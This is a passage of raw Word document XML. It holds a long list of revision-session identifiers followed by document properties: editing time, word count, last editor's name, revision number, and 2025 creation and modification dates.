    <w:rsid w:val="0078465D"/>
    <w:rsid w:val="00785928"/>
    <w:rsid w:val="007949C2"/>
    <w:rsid w:val="007B120C"/>
    <w:rsid w:val="007B19E5"/>
    <w:rsid w:val="007C2C47"/>
    <w:rsid w:val="007C2C7E"/>
    <w:rsid w:val="007C378E"/>
    <w:rsid w:val="007D0609"/>
    <w:rsid w:val="007D3A85"/>
    <w:rsid w:val="007E5BF4"/>
    <w:rsid w:val="00804289"/>
    <w:rsid w:val="008045D8"/>
    <w:rsid w:val="00817816"/>
    <w:rsid w:val="008244CC"/>
    <w:rsid w:val="008302C7"/>
    <w:rsid w:val="0083046E"/>
    <w:rsid w:val="00830F2D"/>
    <w:rsid w:val="008434BF"/>
    <w:rsid w:val="00853432"/>
    <w:rsid w:val="00856000"/>
    <w:rsid w:val="00865EFE"/>
    <w:rsid w:val="00884500"/>
    <w:rsid w:val="008916AE"/>
    <w:rsid w:val="008B183B"/>
    <w:rsid w:val="008B1C72"/>
    <w:rsid w:val="008C42C2"/>
    <w:rsid w:val="008D6C4D"/>
    <w:rsid w:val="008E0D6A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3252C"/>
    <w:rsid w:val="0093477C"/>
    <w:rsid w:val="00950618"/>
    <w:rsid w:val="009513BB"/>
    <w:rsid w:val="00952810"/>
    <w:rsid w:val="00961BBB"/>
    <w:rsid w:val="0096208C"/>
    <w:rsid w:val="0096511A"/>
    <w:rsid w:val="00971118"/>
    <w:rsid w:val="00983861"/>
    <w:rsid w:val="00985035"/>
    <w:rsid w:val="009934F0"/>
    <w:rsid w:val="00995877"/>
    <w:rsid w:val="009A1924"/>
    <w:rsid w:val="009A5566"/>
    <w:rsid w:val="009A77CB"/>
    <w:rsid w:val="009B1702"/>
    <w:rsid w:val="009B3321"/>
    <w:rsid w:val="009B3B5A"/>
    <w:rsid w:val="009C0CF1"/>
    <w:rsid w:val="009C7091"/>
    <w:rsid w:val="009C742E"/>
    <w:rsid w:val="009D0645"/>
    <w:rsid w:val="009F1253"/>
    <w:rsid w:val="009F270C"/>
    <w:rsid w:val="009F387C"/>
    <w:rsid w:val="009F5065"/>
    <w:rsid w:val="00A10E83"/>
    <w:rsid w:val="00A15C83"/>
    <w:rsid w:val="00A2111C"/>
    <w:rsid w:val="00A233A8"/>
    <w:rsid w:val="00A371DB"/>
    <w:rsid w:val="00A46E73"/>
    <w:rsid w:val="00A64183"/>
    <w:rsid w:val="00AB6341"/>
    <w:rsid w:val="00AC44C0"/>
    <w:rsid w:val="00AD03E2"/>
    <w:rsid w:val="00AE1D8A"/>
    <w:rsid w:val="00AE1FDE"/>
    <w:rsid w:val="00AE243B"/>
    <w:rsid w:val="00AE53D9"/>
    <w:rsid w:val="00AF7C06"/>
    <w:rsid w:val="00B13B4B"/>
    <w:rsid w:val="00B264C8"/>
    <w:rsid w:val="00B27C73"/>
    <w:rsid w:val="00B30AC6"/>
    <w:rsid w:val="00B73394"/>
    <w:rsid w:val="00B9137E"/>
    <w:rsid w:val="00B956AB"/>
    <w:rsid w:val="00B968FE"/>
    <w:rsid w:val="00B97542"/>
    <w:rsid w:val="00BD025C"/>
    <w:rsid w:val="00BD6ADE"/>
    <w:rsid w:val="00BE1639"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rsid w:val="00BE1C48"/>
    <w:rsid w:val="00BF36A4"/>
    <w:rsid w:val="00BF640E"/>
    <w:rsid w:val="00C00112"/>
    <w:rsid w:val="00C174D6"/>
    <w:rsid w:val="00C212CE"/>
    <w:rsid w:val="00C312FA"/>
    <w:rsid w:val="00C36F05"/>
    <w:rsid w:val="00C469D8"/>
    <w:rsid w:val="00C5031D"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rsid w:val="00C606E6"/>
    <w:rsid w:val="00C63AD9"/>
    <w:rsid w:val="00C6615B"/>
    <w:rsid w:val="00C77E41"/>
    <w:rsid w:val="00C8626F"/>
    <w:rsid w:val="00C93DCC"/>
    <w:rsid w:val="00CA2E19"/>
    <w:rsid w:val="00CB11A3"/>
    <w:rsid w:val="00CB51D3"/>
    <w:rsid w:val="00CD16DD"/>
    <w:rsid w:val="00CD69E8"/>
    <w:rsid w:val="00CF15D0"/>
    <w:rsid w:val="00D001AA"/>
    <w:rsid w:val="00D05CCE"/>
    <w:rsid w:val="00D139C3"/>
    <w:rsid w:val="00D24CF4"/>
    <w:rsid w:val="00D30F9A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76A9C"/>
    <w:rsid w:val="00DB04F8"/>
    <w:rsid w:val="00DB66C1"/>
    <w:rsid w:val="00DC003D"/>
    <w:rsid w:val="00DF03FA"/>
    <w:rsid w:val="00DF1454"/>
    <w:rsid w:val="00DF25EE"/>
    <w:rsid w:val="00E02B11"/>
    <w:rsid w:val="00E13401"/>
    <w:rsid w:val="00E148EF"/>
    <w:rsid w:val="00E27453"/>
    <w:rsid w:val="00E675B9"/>
    <w:rsid w:val="00E802CE"/>
    <w:rsid w:val="00E80FFE"/>
    <w:rsid w:val="00E8518B"/>
    <w:rsid w:val="00E94D40"/>
    <w:rsid w:val="00EC03D0"/>
    <w:rsid w:val="00EC06C5"/>
    <w:rsid w:val="00EC35CB"/>
    <w:rsid w:val="00EE10DE"/>
    <w:rsid w:val="00EF4ADA"/>
    <w:rsid w:val="00F03722"/>
    <w:rsid w:val="00F20ED9"/>
    <w:rsid w:val="00F2105D"/>
    <w:rsid w:val="00F52F00"/>
    <w:rsid w:val="00F570B7"/>
    <w:rsid w:val="00F67AC2"/>
    <w:rsid w:val="00F72418"/>
    <w:rsid w:val="00F72D85"/>
    <w:rsid w:val="00F7377D"/>
    <w:rsid w:val="00F74364"/>
    <w:rsid w:val="00F76850"/>
    <w:rsid w:val="00F84BA8"/>
    <w:rsid w:val="00F87A93"/>
    <w:rsid w:val="00F90A8C"/>
    <w:rsid w:val="00F91A1E"/>
    <w:rsid w:val="00FA27C3"/>
    <w:rsid w:val="00FA32D6"/>
    <w:rsid w:val="00FB359E"/>
    <w:rsid w:val="00FB5D42"/>
    <w:rsid w:val="00FB7FFB"/>
    <w:rsid w:val="00FC1018"/>
    <w:rsid w:val="00FC36F2"/>
    <w:rsid w:val="00FC6E93"/>
    <w:rsid w:val="00FD2FEB"/>
    <w:rsid w:val="00FD498F"/>
    <w:rsid w:val="00FD4B58"/>
    <w:rsid w:val="00FD61DC"/>
    <w:rsid w:val="00FD7D91"/>
    <w:rsid w:val="00FE2150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1897</TotalTime>
  <Pages>1</Pages>
  <Words>3243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Максим Михайлич</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-21T16:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-22T12:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>